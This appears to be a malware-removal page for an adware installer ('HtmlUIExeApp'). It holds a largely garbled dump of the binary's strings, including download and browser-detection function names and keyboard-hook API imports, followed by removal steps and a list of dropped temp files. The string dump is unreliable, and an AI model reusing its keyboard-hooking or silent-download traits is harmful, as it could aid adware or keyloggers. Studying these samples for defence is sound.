Janko`h/o`/-1,rkncrf/bijj SV-02,c<,..za

-3,1 T-1,`-4,b-4,w37 P,abov=.vN

Fcjjcbl,.l-3,dc*-441,cbl P.fE

CI([onJ-3,e-00,ix,,lci^mbnAgho,,a-4,*bgx*;( T.CE

THtmlUIExeAppU

>,-Bbp,-hhw-3,dja,-c-4,k` U,ljbqea-4 U,dj-3,qljn`7 T.PO

HtmlUIExeApp

Rd`ahoi U,ld-2,v`fk U,un,.juikw Q,h`vu``fd;,.^ A

Plkwa S-2 U,ejaqla-1 U,mj-2,qejm` T,v-0,kjm`b( T,zmmw,.uvkm`ww,.rmhb U,ghava*^D

Oihpfbu T,gitpoida,.ni T,ZBUIGIFPK W,tpo`b T,gt W,g-0,uua`sk-2-.,urj`nic RW,dk`snj-0,nic P,)G-3

ung`.Nr

HtmlUiExeApp

gbo`dhfm.cV

^a-2,vmvzC-4,Ejoej4 R,YEM R,ew,.fewo``aj,.,,e-2,qyiglk T-3,pcgkq-4 T,fc-4 T,ofam` R-1,vgtehkeiw RR,ok`vej-0,g,,sgvdk-0,v,,vkqxe-1,veji,,,.L

Hmeckh,,-0,a,,-3,jcczj,.xdj,.,.V``i R,Fjib-0,gjej-1-.-,,Nbx_-01,imb.wI

irsoExecutePackage

irsoReportPackageError

irsoReportPackageSkip

irsoReportPackageQuit

irsoReportPackageSuccess

irsoReportPackageInfo

irsoGetPackageFilenameFromHttp

irsoGetPackageExecExitCode

irsoGetPackageExecResult

irsoGetPackageDwnldUrls

irsoSetPackageRelProgressShare

irsoGetFireFoxEXE

irsoGetIEEXE

irsoGetChromeEXE

irsoGetOperaEXE

irsoGetFireFoxVer

irsoGetChromeVer

irsoGetOperaVer

irsoUninstallAddExeCmd

irsoUninstallAddOpenBrowserCmd

irsoUninstallAddRegistryKey

irsoUninstallExecute

irsoReportStart

irsoReportInfo

irsoSetExclusiveExec

isroSetReportUrl

-11,jycmjaOaahDgvyc-11.Pg

zfc.bz

]no^dun.Vx

M`aigh/`xj-22,gkj/-3,n-2,nc-1,/iazak,. W,y.zy

\fuj-1,w U,P\O U,qah`k,.nlvcbqff,-U>

\GCAPMA][.oj

TcUlue.PL

W`mmqzeon,.wvamaff P,4.]

z`o1caig2,.hf5b Q,0cfh)914`,,34`6;ia2f=ae-3,L1

e-1,f.Cw

Jfafzjcd,.wef,.Tlwmkhq,.admoqt,- P -,=>

-0,ilCcbd.LG

)h-4,k.bR

^exmaa-3-.,oeebl`,,zf T-4,zhvx R,)tm-1,hi-4-.,hvi,.dm-42,`jk P.g,I

Ydvef`p V,j`nczlla,.lvukid<,.b^

Ukszv.ra

[eckbn R-2,a, kgg-4,khbbxl,.blzzjneky R,N[B,,-G.9

FbghLbtaYhe.AU

Jnma W,jv-2,h-2,>/.or

1.2.1

inflate 1.2.1 Copyright 1995-2003 Mark Adler

deflate 1.2.1 Copyright 1995-2003 Jean-loup Gailly

?456789:;<=

!"#$%&'()* ,-./0123

333333333333333333

33333833

3333333333333338

:*"*"$3338

33333333

33333333333

3333333333338

33338?383

333333333333

:*3:"$3338

333333333333333

[,.hV/

[Wu%$%s

r0 .Sp%8

I3j%D-

;O7%s

h.wWaA

1.Fy<*5

DK.kLQ'

-xV}>

L.gWq

J}.kU

GetProcessHeap

GetCPInfo

RegQueryInfoKeyA

RegOpenKeyExA

RegFlushKey

RegEnumKeyExA

RegDeleteKeyA

RegCreateKeyExA

RegCloseKey

SetViewportOrgEx

UnhookWindowsHookEx

SetWindowsHookExA

MapVirtualKeyA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyState

GetKeyNameTextA

GetAsyncKeyState

EnumWindows

EnumThreadWindows

EnumChildWindows

ActivateKeyboardLayout

GetKeyboardType

"$ %),'8

38000=344

4? 3!0 3!6

&W!%D)*

H.JXA

1 0 .'7(2':

- /*-( ,'.-!$$$&'('/*) ,*/.)*72-7)

&)"%&$&'&",,/- '

944(@32%2u8

.PMDF<7I

2222444424

.idata

.edata

P.reloc

P.rsrc

#-**(-#,

SOFTWARE\Microsoft\Windows NT\CurrentVersion

errorUrl

\bin\SubWCRev.exe

Please login as administrator and try again.

OLE error %.8x%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s

Clipboard does not support Icons/Menu '%s' is already being used by another form

No help found for %s#No context-sensitive help installed$No topic-based help system installed

OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic

Unsupported clipboard format

Invalid stream format$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d) Out of memory while expanding memory stream

Error reading %s%s%s: %s

Failed to get data for '%s'

Failed to set data for '%s'

Resource %s not found

Ancestor for '%s' not found

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file %s

Cannot open file %s

External exception %x

Interface not supported

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid GUID value

I/O error %d

Integer overflow Invalid floating point operation

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
Delete the original Installer file.
Delete or disinfect the following files created/modified by the Installer:

%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB319.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0F6.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\bootstrap_34203.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2FA.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\logo4[1].jpg (1041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Pause_Button.png (577 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.